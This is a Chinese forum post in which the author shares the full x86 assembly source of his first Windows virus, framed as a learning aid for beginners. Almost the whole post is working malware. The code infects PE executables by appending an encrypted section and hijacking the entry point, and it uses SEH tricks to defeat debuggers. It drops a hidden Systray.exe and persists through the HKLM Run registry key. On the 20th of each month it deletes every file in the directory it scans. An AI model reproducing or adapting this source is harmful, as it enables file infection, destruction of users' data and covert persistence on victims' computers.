文章作者:haiwei/CVC.GB
这是俺写的第一个病毒,其中很多代码都是抄别人的(汗~~~)
贴出来的目的是希望对初学者有点帮助,自己也怀念一上:)
复制内容到剪贴板
代码:
.386
.Model Flat, StdCall
Option Casemap :None ; 不区分大小写(对API与API常数无效)
;___________________________________________________________________________
include useful.inc
.CODE
VStart:
call Start
Start: ;virus starts here :)
pop ebx ;病毒在宿主中的位置
sub ebx , offset Start
Assume FS:NOTHING
push offset SEH_Handler
push fs:[0]
mov fs:[0],esp ;//建立SEH的基本ERR结构,如果不明白,就仔细研究一下吧
call GetKBase ;获得KERNEL.DLL基地址
jnz VStar
jz VStar
db 0e9h
VStar:
call GetAPIz;获得病毒用到的APIs的地址
jz Load
jnz Load
db 0E8h
Load:
call PayLoad
call _GetCurrentProcess
mov hProcess[ebx],eax
;push 0
;call _GetModuleHandle[ebx]
;mov hModule[ebx],400000h
lea esi,[offset szEXEPath+ebx]
push MAX_PATH
push esi
;lea eax,[offset hModule+ebx]
;push eax
;lea eax,[offset hProcess+ebx]
push NULL
call _GetModuleFileNameA[ebx]
push MAX_PATH
lea eax,[offset szCurDir+ebx]
push eax
call _GetCurrentDirectoryA[ebx]
lea edi,[offset szFileName+ebx]
push edi
lea eax,[offset szCurDir+ebx]
push eax
call _lstrcat[ebx]
push esi
push edi
call _lstrcmpi[ebx]
or eax,eax
;jz StartInfect
mov BYTE ptr [IsSelf],0
call CreatePE
call rtInit
call ScrRun
Ret2Host:
.if BYTE ptr [IsSelf]==1
pop fs:[0] ;//修复后显示20,因为我们让ecx=10
add esp,4
invoke ExitProcess,NULL
.endif
mov esi,400000h
assume esi :ptr IMAGE_DOS_HEADER;ESI指向IMAGE_DOS_HEADER结构
add esi,[esi].e_lfanew ;此时edx指向IMAGE_NT_HEADERS
assume esi:ptr IMAGE_NT_HEADERS
movzx eax,[esi].FileHeader.SizeOfOptionalHeader
add eax,18h
add eax,esi
mov edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
mov ecx,[edi].Misc.VirtualSize
mov eax,[edi].PointerToRawData
add eax,400000h
push ecx
push eax
jnz de
jz de
db 0e8h
de:
call Decrypt
push DWORD ptr HostEntry[ebx]
ret ;此时栈顶为HostEntry,返回正常入口执行
StartInfect:
push FILE_EXE
@pushsz "d:\test"
call EnumDisk
ret
;**********获得image of kernel32.dll的基址*****************
GetKBase:
mov edi , [esp+0ch]
and edi , 0FFFF0000h
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;判断是否是MZ
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi指向PE标志
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;是否有PE标志
.break;如果有跳出循环
.endif
.endif
sub edi, 010000h
.if edi < MIN_KERNEL_SEARCH_BASE ;win9x
mov edi, 0bff70000h ;0bff7000h=9x'base
.break
.endif
.endw
mov hKernel32[ebx],edi;把找到的KERNEL32。DLL的基地址保存起来
ret
GetAPIz:
mov edx,edi ;edx->KERNEL32基地址
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress
add edx,hKernel32[ebx];EDX->KERNEL32输出表地址
assume edx:ptr IMAGE_EXPORT_DIRECTORY
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp->指向所有函数名的RVA数组
xor eax,eax ;eax为序号
.repeat
push 14 ;为GetProcAddress函数名的长度
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;比较输出表中第I个函数名是否是GetProcessAddress
.if zero?
.break ;如果是跳出
.endif
add ebp,4 ;下一个RVA
inc eax ;序号加1
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames为函数的个数
mov ebp, [edx].AddressOfNameOrdinals ;指向AddressOfNames数组中相关函数的序数的16位数组
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;取GetProcessAddress函数的序号
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions指向所有输出函数的RVA数组的首址
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax为GetProcAddress函数的地址
mov _GetProcAddress[ebx],eax
GetOApiz:
call @api_table
db 'CreateThread',0
db 'CreateRemoteThread',0
db 'WinExec',0
db 'CreateMutexA',0
db 'OpenMutexA',0
db 'ReleaseMutex',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'FindClose',0
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'UnmapViewOfFile',0
db 'SetFilePointer',0
db 'WriteFile',0
db 'CloseHandle',0
db 'VirtualAlloc',0
db 'VirtualAllocEx',0
db 'WriteProcessMemory',0
db 'VirtualFree',0
db 'VirtualFreeEx',0
db 'lstrcmpi',0
db 'lstrcpy',0
db 'lstrcat',0
db 'lstrlen',0
db 'GetFileSize',0
db 'GetSystemDirectoryA',0
db 'GetModuleFileNameA',0
db 'Sleep',0
db 'GetSystemTime',0
db 'DeleteFileA',0
db 'OpenProcess',0
db 'ExitProcess',0
db 'GetCurrentProcess',0
db 'GetModuleBaseName',0
db 'GetModuleHandleA',0
db 'GetCurrentDirectoryA',0
@api_table:
pop edi
call @api_dest
K_Apiz:
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectoryA dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_ExitProcess dd 0
_GetCurrentProcess dd 0
_GetModuleBaseName dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
K_API_NUM = ($-K_Apiz)/4 ;病毒中用到的API函数的个数
@api_dest:
pop esi ;esi为存放找到的函数地址数组的首址
push K_API_NUM
pop ecx
xor ebp,ebp
K_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hKernel32[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop K_begin
ret
PayLoad:
call @PL1
SystemTime SYSTEMTIME <>
@PL1: mov esi,[esp] ;esi指向SYSTEMTIME结构
call _GetSystemTime[ebx]
;获取当前系统时间
movzx eax , word ptr [esi+6] ;[esi+6]为SYSTEMTIME结构的天数成员
cmp ax,14h ;20号吗?
jnz PL_Exit
KILL: ;如果当前是20号则发作
push FILE_ALL
@pushsz 'd:\test'
call EnumDir;扫描目录
PL_Exit:
ret
;*********************************************
;the thread begin to enum all file in disk and
;network , when it finds a pe file Infect it!
;*********************************************
PEThread PROC MReloc : DWORD
PT_Work:
mov ebx,MReloc
push FILE_EXE
@pushsz 'd:\test'
call EnumDir
;push NULL
;call EnumNetWork
push 1000*60*60 ;sleep an hour:)
call _Sleep[ebx]
jmp short PT_Work
PEThread ENDP
;************InfectDisk***********************
;遍历本地硬盘,从C盘到Z盘,调用EnumDir遍历所有exe
;*********************************************
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir
mov eax,DirName
inc byte ptr [eax]
mov al,byte ptr[eax]
.UNTIL al > 'z'
mov byte ptr [eax] , 'c'
ret 8
EnumDisk ENDP
;************EnumDir************
;遍历DirName,寻找FileType类型文件
;*******************************
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx]
@pushsz '\*.*'
push esi ;DirorFile
call _lstrcat[ebx]
lea edi,[offset wfd+ebx]
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]=='.';wfd.cFilename
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx]
@pushsz '\'
push esi
call _lstrcat[ebx]
lea eax,[wfd+44+ebx]
push eax
push esi ;DirorFile
call _lstrcat[ebx]
mov eax , dword ptr [wfd+ebx]
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir
.else ;是文件
push dword ptr FileType
push esi
call AnFile
.endif
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNexeFile fail
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
AnFile PROC FileName:DWORD,FileType:DWORD
pushad
AF_00: lodsb
or al,al
jnz AF_00
.if FileType == FILE_ALL ;all
push FileName
call _DeleteFile[ebx]
.elseif FileType == FILE_EXE ;exe
mov eax,DWORD ptr [esi-5]
.if eax =='exe.'
push FileName
call InfectFile
.endif
.else ;FileType = FILE_HTM
AF_01: sub esi , 2
lodsb
cmp al,'.'
jnz AF_01
mov eax,DWORD ptr [esi-1]
;.if eax == 'mth.'
;push FileName
;call Parse_HTM
;.endif
.endif
popad
ret 8
AnFile ENDP
;感染PE文件
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];打开要感染的文件
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;创建内存映射文件
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;映射为可读写
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;ESI指向IMAGE_DOS_HEADER结构
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;是否是MZ
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;此时edx指向IMAGE_NT_HEADERS
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;是PE文件吗?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; 感染标志
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;取原程序入口偏移
add eax,[esi].OptionalHeader.ImageBase ;加上基地址
mov HostEntry[ebx],eax ;保存原入口
;***************************************************************
;判断是否有足够空间存储新节
;28h=sizeof IMAGE_SECTION_HEADER
;18h=sizeof IMAGE_FILE_HEADER+Signature
;edi将指向新节
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections ;取文件中的块数
mov ecx,28h
mul ecx
lea edi,[esi]
sub edi,pMapping
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi
mov edi,eax
add edi,pMapping ;I forgot this first
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders
jmp IF_F1
.ENDIF
;*****************************************
;空间允许, ^0^,开始插入新节并填充各字段
;esi指向原文件最后一个节,利用它来填充新节某些字段
;*****************************************
pushad
movzx eax,[esi].FileHeader.SizeOfOptionalHeader
add eax,18h
add eax,esi
mov edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
mov eax,[edi].Characteristics
or eax,0e0000000h
mov DWORD ptr [edi].Characteristics,eax
mov ecx,[edi].Misc.VirtualSize
mov eax,[edi].PointerToRawData
add eax,pMapping
push ecx
push eax
jnz En
jz En
db 0e8h
En:
call Encrypt
popad
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],68616977h ;'haiw'
mov WORD ptr [edi+4],6569h;ei
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
push eax
pop [edi].VirtualAddress
mov eax,offset VEnd-offset VStart
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
lea eax,[edi-28h+14h] ;PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax
mov [edi].Characteristics,0E0000020h ;可读可写可执行
;***************************************************************
;更新SizeOfImage,AddressOfEntryPoint,使新节可以正确加载并首先执行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax
mov word ptr [esi+1ah],0888h ;写入感染标志
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx]
;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
call _WriteFile[ebx]
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx]
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
Encrypt proc base:DWORD,len:DWORD
mov esi,base
mov eax,len
mov ecx,8
xor edx,edx
div ecx
mov ecx,eax
re2:
mov eax,DWORD ptr [esi]
mov edx,DWORD ptr [esi+4]
pushad
call RC5_Encrypt
mov DWORD ptr [esi],eax
mov DWORD ptr [esi+4],edx
popad
mov ebx,8
add esi,ebx
loop re2
ret
Encrypt endp
Decrypt proc uses ebx base:DWORD,len:DWORD
mov esi,base
mov eax,len
mov ecx,8
xor edx,edx
div ecx
mov ecx,eax
re3:
mov eax,DWORD ptr [esi]
mov edx,DWORD ptr [esi+4]
pushad
call RC5_Decrypt
mov DWORD ptr [esi],eax
mov DWORD ptr [esi+4],edx
popad
mov ebx,8
add esi,ebx
loop re3
ret
Decrypt endp
RC5_Encrypt PROC
add eax,rc5key.S0
add edx,rc5key.S1
lea esi,rc5key.S2
mov edi,rc5key.cont
@gRc5encrypt:
inc edi
mov ecx,edx
xor eax,edx
and ecx,1fh ;to get the shift result
rol eax,cl
add eax,DWORD ptr [esi]
mov ebx,4
add esi,ebx
mov ecx,eax
xor edx,eax
and ecx,1fh
rol edx,cl
add edx,DWORD ptr [esi]
mov ebx,4
add esi,ebx
cmp edi,rc5key.turn
jb @gRc5encrypt
mov rc5key.cont,0
ret
RC5_Encrypt ENDP
RC5_Decrypt PROC ;key data to be decrypt is in eax,edx
lea esi,rc5key.S17
mov edi,rc5key.cont
@gRc5decrypt:
inc edi
mov ecx,eax
sub edx,DWORD ptr [esi]
mov ebx,4
sub esi,ebx
and ecx,1fh ;to get the shift result
ror edx,cl
xor edx,eax
mov ecx,edx
sub eax,DWORD ptr [esi]
mov ebx,4
sub esi,ebx
and ecx,1fh
ror eax,cl
xor eax,edx
cmp edi,rc5key.turn
jb @gRc5decrypt
sub edx,rc5key.S1
sub eax,rc5key.S0
ret
RC5_Decrypt ENDP
;***************用SEH反动态跟踪****************
SEH_Handler proc uses ebx pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
;push ebp
;mov ebp,esp
; mov eax,[ebp+8] ;the pointer to EXCEPTION_POINTERS
; mov ebx,[eax]
;pointer to _EXCEPTION_RECORD
mov ebx,pExcept
assume ebx:ptr EXCEPTION_RECORD
cmp [ebx].ExceptionCode,80000003h
jz Ice
cmp [ebx].ExceptionCode,80000005h
jnz NoIce
Ice:
mov eax,pContext
Assume eax:ptr CONTEXT
mov [eax].regEcx,45E0h ;//Ecx改变
mov ebx,offset exit
mov [eax].regEip,ebx ;
;//从我们想要的地方开始执行,嘿嘿,这就是很多
;//反跟踪软件把你引向的黑暗之域
NoIce:
mov eax,0 ;//ExceptionContinueExecution,表示已经修复
;//CONTEXT,可从异常发生处
;//reload并继续执行
ret
SEH_Handler endp
exit:
push 0
call _ExitProcess
;********CreatePE**********************
CreatePE PROC
LOCAL ByteWrite:DWORD
.if BYTE ptr [IsSelf]==1
ret
.endif
pushad
lea eax , [offset szFilePath+ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[ebx]
or eax,eax
jnz CT_Exit
lea eax , [offset szFilePath+ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[ebx]
or eax,eax
jz CT_Exit
xchg eax,esi
lea edi,ByteWrite
push 0
push edi
push 200h ; 文件头<200h & FileAliagment=200h
lea eax,[offset MDosStub+ebx]
push eax
push esi ;esi=hFile
call _WriteFile[ebx] ;Write DosStub,NTHeader,SectionHeader
push 0
push edi
push VRAW_SIZE
lea eax,[offset VStart+ebx]
push eax
push esi
call _WriteFile[ebx] ;Write code and import tatle
push esi
call _CloseHandle[ebx]
CT_Exit:
popad
ret
CreatePE ENDP
rtInit:
@pushsz 'shlwapi.dll'
call _LoadLibrary[ebx]
@pushsz 'SHSetValueA'
push eax
call _GetProcAddress[ebx]
mov _SHSetValueA[ebx],eax
ret
ScrRun:
push SW_HIDE
call @RT2
szFilePath db 50 dup (0)
@RT2:
call _WinExec[ebx]
RegistSCR:
lea eax,[offset szFilePath+ebx]
push 50
push eax
push REG_SZ
@pushsz 'SysTry'
@pushsz 'Software\Microsoft\Windows\CurrentVersion\Run'
push HKEY_LOCAL_MACHINE
call _SHSetValueA[ebx]
ret
;*************Virus Data******************************
Signature db '紫色心情,你永远的期待',0
HostEntry dd 0
hKernel32 dd 0
szEXEPath db MAX_PATH dup (0)
nGetProcAddress db 'GetProcAddress',0
nLoadLibrary db 'LoadLibraryA',0
nKernel db 'Kernel32.dll',0
_LoadLibrary dd 0
_GetProcAddress dd 0
IsSelf db 1
hModule dd 0
szFileName db '\Systray.exe',0
FNameSize = $ - szFileName
wfd WIN32_FIND_DATA <>
_SHSetValueA dd 0
hProcess dd 0
_GetProcessAddress dd 0
szCurDir db MAX_PATH dup (0)
rc5key RC5struct <>
turn dd 8
cont dd 0
S0 dd "hai "
S1 dd " wei"
S2 dd "masm"
S3 dd "edit"
S4 dd "file"
S5 dd "exam"
S6 dd "exam"
S7 dd "viru"
S8 dd "Viru"
S9 dd "ViRu"
S10 dd "vIru"
S11 dd "like"
S12 dd "Like"
S13 dd " you"
S14 dd "YoU"
S15 dd "Hai "
S16 dd "Wei "
S17 dd "Wei "
dd 4 dup(0)
;*****************PE Data*****************************
VImports:
dd offset Kernel32_Pointers + @
dd -1,-1
dd offset Kernel32_Name + @
VIAT:
dd offset Kernel32_Relocated + @
db 14 dup (0)
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0
Kernel32_Beep db ?,?,'MessageBoxA',0
Kernel32_Name db 'User32.dll',0
MDosStub:
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00
db 50h,45h,00,00
MFileHeader:
Machine dw 14Ch
NumberOfSections dw 1
TimeDateStamp dd 3cbe5cc2h
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h
Characteristics dw 10fh
MIMAGE_OPTIONAL_HEADER32:
Magic dw 10bh
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd VRAW_SIZE
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32VersionValue dd 0
SizeOfImage dd 3000h;need to change st
SizeOfHeaders dd 200h
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h
DataDirectory dd 0,0
dd offset VImports+@,VIMPORT_SIZE
dd 14h dup(0)
dd offset VIAT + @,8
dd 0,0,0,0,0,0
MIMAGE_SECTION_HEADER:
Name1 db '.xjs',0,0,0,0
VirtualSize dd offset VEnd - offset VStart
VirtualAddress dd 1000h
SizeOfRawData dd VRAW_SIZE
PointerToRawData dd 200h
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h
VEnd:
END VStart
